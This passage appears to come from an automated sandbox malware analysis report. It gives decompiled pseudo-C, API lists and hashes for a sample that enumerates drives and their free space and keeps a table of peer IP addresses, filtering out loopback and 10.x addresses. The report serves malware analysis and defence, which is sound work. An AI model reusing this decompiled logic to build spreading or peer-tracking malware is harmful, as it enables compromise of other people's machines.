                                                                                                                                                                                                                                                                                    				ExitThread(0);
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    0x004043f9
                                                                                                                                                                                                                                                                                    0x004043f9
                                                                                                                                                                                                                                                                                    0x00404408
                                                                                                                                                                                                                                                                                    0x0040440d
                                                                                                                                                                                                                                                                                    0x00404410
                                                                                                                                                                                                                                                                                    0x00404417
                                                                                                                                                                                                                                                                                    0x00404426
                                                                                                                                                                                                                                                                                    0x0040442f
                                                                                                                                                                                                                                                                                    0x00404432
                                                                                                                                                                                                                                                                                    0x00404434
                                                                                                                                                                                                                                                                                    0x0040443a
                                                                                                                                                                                                                                                                                    0x00404456
                                                                                                                                                                                                                                                                                    0x0040445c
                                                                                                                                                                                                                                                                                    0x0040446c
                                                                                                                                                                                                                                                                                    0x0040448c
                                                                                                                                                                                                                                                                                    0x00404492
                                                                                                                                                                                                                                                                                    0x00404499
                                                                                                                                                                                                                                                                                    0x0040449d
                                                                                                                                                                                                                                                                                    0x004044b5
                                                                                                                                                                                                                                                                                    0x004044bf
                                                                                                                                                                                                                                                                                    0x004044bf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040449d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004044c7
                                                                                                                                                                                                                                                                                    0x004044c7
                                                                                                                                                                                                                                                                                    0x004044d1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                                                    • String ID: %x%X$0
                                                                                                                                                                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                                                    • Opcode ID: fefae300a6ae166907af6779e4e4d81ad735c504abc0138177021c7cc3709374
                                                                                                                                                                                                                                                                                    • Instruction ID: 3e2b717ade092063a9efcdadcacb4b05de8fa546afe9c034d67f52ff400308d4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fefae300a6ae166907af6779e4e4d81ad735c504abc0138177021c7cc3709374
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 732121B0940318ABEB109BE0DC4DFEE7B78BB48701F548529F601B61D0DBB995448B69
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                                                                    			E004054A0() {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				short _v24;
                                                                                                                                                                                                                                                                                    				short _v556;
                                                                                                                                                                                                                                                                                    				short _v2604;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2608;
                                                                                                                                                                                                                                                                                    				union _ULARGE_INTEGER _v2612;
                                                                                                                                                                                                                                                                                    				long _v2616;
                                                                                                                                                                                                                                                                                    				short _v3148;
                                                                                                                                                                                                                                                                                    				intOrPtr _v3152;
                                                                                                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				struct %anon54 _t43;
                                                                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				GetModuleFileNameW(0, 0x4163c0, 0x104);
                                                                                                                                                                                                                                                                                    				_t34 = E0040D180(0x4163c0); // executed
                                                                                                                                                                                                                                                                                    				_t69 = _t68 + 4;
                                                                                                                                                                                                                                                                                    				 *0x4163b8 = _t34;
                                                                                                                                                                                                                                                                                    				while(1 != 0) {
                                                                                                                                                                                                                                                                                    					_t36 = E00404CB0(); // executed
                                                                                                                                                                                                                                                                                    					_v8 = _t36;
                                                                                                                                                                                                                                                                                    					_v12 = 2;
                                                                                                                                                                                                                                                                                    					while(_v12 <= 0x19) {
                                                                                                                                                                                                                                                                                    						_t38 = E00404C50(_v8, _v12,  &_v24);
                                                                                                                                                                                                                                                                                    						_t69 = _t69 + 0xc;
                                                                                                                                                                                                                                                                                    						_v16 = _t38;
                                                                                                                                                                                                                                                                                    						_v3152 = _v16;
                                                                                                                                                                                                                                                                                    						if(_v3152 == 2 || _v3152 == 4) {
                                                                                                                                                                                                                                                                                    							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                                                                                                                                                                                                                    							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                                                                    							_push(0x40000000);
                                                                                                                                                                                                                                                                                    							_t63 = _v2608;
                                                                                                                                                                                                                                                                                    							_push(_t63);
                                                                                                                                                                                                                                                                                    							_t43 = _v2612.LowPart;
                                                                                                                                                                                                                                                                                    							_push(_t43);
                                                                                                                                                                                                                                                                                    							L0040EE10();
                                                                                                                                                                                                                                                                                    							_push(_t63);
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                                                                                                                                                                                                                    							_t70 = _t69 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_v3148 & 0x0000ffff) == 0) {
                                                                                                                                                                                                                                                                                    								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                                                                                                                                                                                                                    								_t70 = _t70 + 8;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                                                                                                                                                                                                                    							E00404FC0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                                                                                                                                                                                                                    							_t69 = _t70 + 0x20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x7d0); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				ExitThread(0);
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x004054ae
                                                                                                                                                                                                                                                                                    0x004054c0
                                                                                                                                                                                                                                                                                    0x004054cb
                                                                                                                                                                                                                                                                                    0x004054d0
                                                                                                                                                                                                                                                                                    0x004054d3
                                                                                                                                                                                                                                                                                    0x004054d8
                                                                                                                                                                                                                                                                                    0x004054e5
                                                                                                                                                                                                                                                                                    0x004054ea
                                                                                                                                                                                                                                                                                    0x004054ed
                                                                                                                                                                                                                                                                                    0x004054ff
                                                                                                                                                                                                                                                                                    0x00405515
                                                                                                                                                                                                                                                                                    0x0040551a
                                                                                                                                                                                                                                                                                    0x0040551d
                                                                                                                                                                                                                                                                                    0x00405523
                                                                                                                                                                                                                                                                                    0x00405530
                                                                                                                                                                                                                                                                                    0x0040555f
                                                                                                                                                                                                                                                                                    0x00405574
                                                                                                                                                                                                                                                                                    0x0040557a
                                                                                                                                                                                                                                                                                    0x0040557c
                                                                                                                                                                                                                                                                                    0x00405581
                                                                                                                                                                                                                                                                                    0x00405587
                                                                                                                                                                                                                                                                                    0x00405588
                                                                                                                                                                                                                                                                                    0x0040558e
                                                                                                                                                                                                                                                                                    0x0040558f
                                                                                                                                                                                                                                                                                    0x00405594
                                                                                                                                                                                                                                                                                    0x004055a2
                                                                                                                                                                                                                                                                                    0x004055a8
                                                                                                                                                                                                                                                                                    0x004055b4
                                                                                                                                                                                                                                                                                    0x004055c2
                                                                                                                                                                                                                                                                                    0x004055c8
                                                                                                                                                                                                                                                                                    0x004055c8
                                                                                                                                                                                                                                                                                    0x004055e5
                                                                                                                                                                                                                                                                                    0x0040560b
                                                                                                                                                                                                                                                                                    0x00405610
                                                                                                                                                                                                                                                                                    0x00405610
                                                                                                                                                                                                                                                                                    0x004054fc
                                                                                                                                                                                                                                                                                    0x004054fc
                                                                                                                                                                                                                                                                                    0x0040561d
                                                                                                                                                                                                                                                                                    0x0040561d
                                                                                                                                                                                                                                                                                    0x0040562a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004054AE
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004163C0,00000104), ref: 004054C0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: CreateFileW.KERNEL32(004054D0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040D1A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D1B5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D180: CloseHandle.KERNEL32(000000FF), ref: 0040D1C2
                                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 0040562A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: GetLogicalDrives.KERNEL32 ref: 00404CB6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegOpenKeyExW.KERNEL32 ref: 00404D04
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404D31
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404CB0: RegCloseKey.ADVAPI32(?), ref: 00404D4E
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040561D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404C50: lstrcpyW.KERNEL32(?,?), ref: 00404CA3
                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32 ref: 0040555F
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405574
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040558F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055A2
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055C2
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004055E5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                                                    • Opcode ID: 325e993603c8bda3392c0f0bd153b9b3ac43164d3fc352dd12edcd88a3ba2bb9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9bd4fa2fb620ac2810ea8b244f600aa7f59dc27fdf478d4548bf3fce0c8904cf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 325e993603c8bda3392c0f0bd153b9b3ac43164d3fc352dd12edcd88a3ba2bb9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D418371900208BBE714DB94DC45FEE7778AB48700F1085AAF209B61D0DA799B84CF6A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 181 409a30-409a47 call 409770 184 409a49 181->184 185 409a4e-409a6a call 4094e0 strstr 181->185 186 409c53-409c56 184->186 189 409a6c-409a88 call 4094e0 strstr 185->189 190 409aad-409ac9 call 4094e0 strstr 185->190 197 409aa8 189->197 198 409a8a-409aa6 call 4094e0 strstr 189->198 195 409acb-409ae7 call 4094e0 strstr 190->195 196 409b0c-409b22 EnterCriticalSection 190->196 207 409b07 195->207 208 409ae9-409b05 call 4094e0 strstr 195->208 200 409b2d-409b36 196->200 197->186 198->190 198->197 203 409b67-409b72 call 409980 200->203 204 409b38-409b48 200->204 215 409c48-409c4d LeaveCriticalSection 203->215 216 409b78-409b86 203->216 209 409b65 204->209 210 409b4a-409b63 call 40be60 204->210 207->186 208->196 208->207 209->200 210->203 215->186 219 409b88 216->219 220 409b8c-409b9d call 408b00 216->220 219->220 220->215 223 409ba3-409bc0 call 40be60 220->223 226 409bc2-409bd1 223->226 227 409c17-409c30 223->227 229 409bd3-409bdb Sleep 226->229 230 409bdd-409c15 call 408c70 226->230 228 409c36-409c41 call 409980 227->228 228->215 235 409c43 call 409660 228->235 229->226 230->228 235->215
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409A30(signed int _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                                                                                                                    				signed char _v5;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				signed char _t50;
                                                                                                                                                                                                                                                                                    				char* _t52;
                                                                                                                                                                                                                                                                                    				char* _t54;
                                                                                                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				char* _t68;
                                                                                                                                                                                                                                                                                    				char* _t72;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				char* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                                                                    				char* _t95;
                                                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = E00409770(_a4); // executed
                                                                                                                                                                                                                                                                                    				_t98 = _t97 + 4;
                                                                                                                                                                                                                                                                                    				_t74 = _t50 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				if((_t50 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    					_t52 = strstr(E004094E0(_t74, _a4), "127.");
                                                                                                                                                                                                                                                                                    					_t100 = _t98 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						_t54 = strstr(E004094E0(_t74, _a4), "10.");
                                                                                                                                                                                                                                                                                    						_t102 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t54;
                                                                                                                                                                                                                                                                                    						if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                                                                    							EnterCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    							_v5 = 0;
                                                                                                                                                                                                                                                                                    							_v12 = 0;
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								__eflags = _v12 -  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t93 =  *((intOrPtr*)(0x416e30 + _v12 * 4));
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t93 + 4)) - _a4;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t93 + 4)) != _a4) {
                                                                                                                                                                                                                                                                                    									_t95 = _v12 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t95;
                                                                                                                                                                                                                                                                                    									_v12 = _t95;
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t65 = E0040BE60();
                                                                                                                                                                                                                                                                                    								_t55 = _t65 - _a8;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)(0x416e30 + _v12 * 4)) + 8)) = _t65 - _a8;
                                                                                                                                                                                                                                                                                    								_v5 = 1;
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							E00409980(_t55);
                                                                                                                                                                                                                                                                                    							_t57 = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                                    							__eflags = _t57;
                                                                                                                                                                                                                                                                                    							if(_t57 != 0) {
                                                                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                                                                    								LeaveCriticalSection(0x416df4);
                                                                                                                                                                                                                                                                                    								return _t57;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v13 = 0;
                                                                                                                                                                                                                                                                                    							__eflags =  *0x416e2c - 0x200;
                                                                                                                                                                                                                                                                                    							if( *0x416e2c == 0x200) {
                                                                                                                                                                                                                                                                                    								_v13 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t57 = E00408B00(0xc); // executed
                                                                                                                                                                                                                                                                                    							_v20 = _t57;
                                                                                                                                                                                                                                                                                    							__eflags = _v20;
                                                                                                                                                                                                                                                                                    							if(_v20 == 0) {
                                                                                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_v20 + 8)) = E0040BE60() - _a8;
                                                                                                                                                                                                                                                                                    								__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                                    								if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									_t89 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    									_t60 = _v20;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(0x416e30 + _t89 * 4)) = _v20;
                                                                                                                                                                                                                                                                                    									_t77 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    									_t78 = _t77 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t78;
                                                                                                                                                                                                                                                                                    									 *0x416e2c = _t78;
                                                                                                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                                                                                                    									_t57 = E00409980(_t60);
                                                                                                                                                                                                                                                                                    									__eflags = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                                    									if((_a12 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    										_t57 = E00409660(_t57); // executed
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L27;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L21;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									L21:
                                                                                                                                                                                                                                                                                    									_t61 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    									__eflags =  *(0x416e2c[_t61]);
                                                                                                                                                                                                                                                                                    									if( *(0x416e2c[_t61]) == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									Sleep(1);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t91 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    								 *(0x416e2c[_t91]) = 1;
                                                                                                                                                                                                                                                                                    								_t80 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    								E00408C70(0x416e2c[_t80]);
                                                                                                                                                                                                                                                                                    								_t60 =  *0x416e2c; // 0x200
                                                                                                                                                                                                                                                                                    								0x416e2c[_t60] = _v20;
                                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t68 = strstr(E004094E0(_t74, _a4), ".10");
                                                                                                                                                                                                                                                                                    						_t106 = _t102 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t68;
                                                                                                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							return _t68;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t68 = strstr(E004094E0(_a4, _a4), ".10.");
                                                                                                                                                                                                                                                                                    						_t102 = _t106 + 0xc;
                                                                                                                                                                                                                                                                                    						__eflags = _t68;
                                                                                                                                                                                                                                                                                    						if(_t68 != 0) {
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t72 = strstr(E004094E0(_t74, _a4), ".127");
                                                                                                                                                                                                                                                                                    					_t109 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                                                                                                                                    					if(_t72 == 0) {
                                                                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                                                                    						return _t72;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t74 = _a4;
                                                                                                                                                                                                                                                                                    					_t72 = strstr(E004094E0(_a4, _a4), ".127.");
                                                                                                                                                                                                                                                                                    					_t100 = _t109 + 0xc;
                                                                                                                                                                                                                                                                                    					__eflags = _t72;
                                                                                                                                                                                                                                                                                    					if(_t72 != 0) {
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t50;
                                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                                    0x00409a3a
                                                                                                                                                                                                                                                                                    0x00409a3f
                                                                                                                                                                                                                                                                                    0x00409a42
                                                                                                                                                                                                                                                                                    0x00409a47
                                                                                                                                                                                                                                                                                    0x00409a60
                                                                                                                                                                                                                                                                                    0x00409a65
                                                                                                                                                                                                                                                                                    0x00409a68
                                                                                                                                                                                                                                                                                    0x00409a6a
                                                                                                                                                                                                                                                                                    0x00409aad
                                                                                                                                                                                                                                                                                    0x00409abf
                                                                                                                                                                                                                                                                                    0x00409ac4
                                                                                                                                                                                                                                                                                    0x00409ac7
                                                                                                                                                                                                                                                                                    0x00409ac9
                                                                                                                                                                                                                                                                                    0x00409b0c
                                                                                                                                                                                                                                                                                    0x00409b11
                                                                                                                                                                                                                                                                                    0x00409b17
                                                                                                                                                                                                                                                                                    0x00409b1b
                                                                                                                                                                                                                                                                                    0x00409b2d
                                                                                                                                                                                                                                                                                    0x00409b30
                                                                                                                                                                                                                                                                                    0x00409b36
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b3b
                                                                                                                                                                                                                                                                                    0x00409b45
                                                                                                                                                                                                                                                                                    0x00409b48
                                                                                                                                                                                                                                                                                    0x00409b27
                                                                                                                                                                                                                                                                                    0x00409b27
                                                                                                                                                                                                                                                                                    0x00409b2a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b2a
                                                                                                                                                                                                                                                                                    0x00409b4a
                                                                                                                                                                                                                                                                                    0x00409b4f
                                                                                                                                                                                                                                                                                    0x00409b5c
                                                                                                                                                                                                                                                                                    0x00409b5f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409b5f
                                                                                                                                                                                                                                                                                    0x00409b67
                                                                                                                                                                                                                                                                                    0x00409b6c
                                                                                                                                                                                                                                                                                    0x00409b70
                                                                                                                                                                                                                                                                                    0x00409b72
                                                                                                                                                                                                                                                                                    0x00409c48
                                                                                                                                                                                                                                                                                    0x00409c4d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409c4d
                                                                                                                                                                                                                                                                                    0x00409b78
                                                                                                                                                                                                                                                                                    0x00409b7c
                                                                                                                                                                                                                                                                                    0x00409b86
                                                                                                                                                                                                                                                                                    0x00409b88
                                                                                                                                                                                                                                                                                    0x00409b88
                                                                                                                                                                                                                                                                                    0x00409b8e
                                                                                                                                                                                                                                                                                    0x00409b96
                                                                                                                                                                                                                                                                                    0x00409b99
                                                                                                                                                                                                                                                                                    0x00409b9d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409ba3
                                                                                                                                                                                                                                                                                    0x00409ba9
                                                                                                                                                                                                                                                                                    0x00409bb7
                                                                                                                                                                                                                                                                                    0x00409bbe
                                                                                                                                                                                                                                                                                    0x00409bc0
                                                                                                                                                                                                                                                                                    0x00409c17
                                                                                                                                                                                                                                                                                    0x00409c1d
                                                                                                                                                                                                                                                                                    0x00409c20
                                                                                                                                                                                                                                                                                    0x00409c27
                                                                                                                                                                                                                                                                                    0x00409c2d
                                                                                                                                                                                                                                                                                    0x00409c2d
                                                                                                                                                                                                                                                                                    0x00409c30
                                                                                                                                                                                                                                                                                    0x00409c36
                                                                                                                                                                                                                                                                                    0x00409c36
                                                                                                                                                                                                                                                                                    0x00409c3f
                                                                                                                                                                                                                                                                                    0x00409c41
                                                                                                                                                                                                                                                                                    0x00409c43
                                                                                                                                                                                                                                                                                    0x00409c43
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bc2
                                                                                                                                                                                                                                                                                    0x00409bce
                                                                                                                                                                                                                                                                                    0x00409bd1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409bd5
                                                                                                                                                                                                                                                                                    0x00409bd5
                                                                                                                                                                                                                                                                                    0x00409bdd
                                                                                                                                                                                                                                                                                    0x00409bea
                                                                                                                                                                                                                                                                                    0x00409bf0
                                                                                                                                                                                                                                                                                    0x00409bfe
                                                                                                                                                                                                                                                                                    0x00409c06
                                                                                                                                                                                                                                                                                    0x00409c0e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409c0e
                                                                                                                                                                                                                                                                                    0x00409b9d
                                                                                                                                                                                                                                                                                    0x00409add
                                                                                                                                                                                                                                                                                    0x00409ae2
                                                                                                                                                                                                                                                                                    0x00409ae5
